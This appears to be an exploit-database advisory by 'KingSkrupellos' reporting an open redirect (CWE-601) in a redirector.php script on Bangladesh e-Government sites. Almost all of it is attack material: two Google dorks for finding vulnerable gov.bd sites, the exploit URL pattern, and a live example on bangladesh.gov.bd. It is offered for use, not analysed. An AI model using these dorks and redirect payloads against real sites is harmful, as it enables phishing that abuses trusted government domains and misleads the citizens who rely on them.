#################################################################################################
# Exploit Title : Technical Support A2i-PMO Bangladesh e-Government Open Redirection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 09/06/2018
# Vendor Homepage : a2i.pmo.gov.bd ~ a2i.gov.bd
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
#################################################################################################
# Google Dork 1 : intext:''কারিগরি সহায়তায় a2i"
# Google Dork 2 : inurl:''/redirector.php?url='' site:gov.bd
# Exploit : /redirector.php?url=[www.DOMAINADDRESSHERE]/&id=8e12b3a9-1145-43c5-8bbe-a415d0e58d98
#################################################################################################
# Example Site => Bangladesh e-Government Official Site is Vulnerable for URL Redirection to Untrusted Site ('Open Redirect')
bangladesh.gov.bd/redirector.php?url=[www.DOMAINADDRESSHERE]/&id=8e12b3a9-1145-43c5-8bbe-a415d0e58d98
# Proof of Concept => archive.is/Jm7O6
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################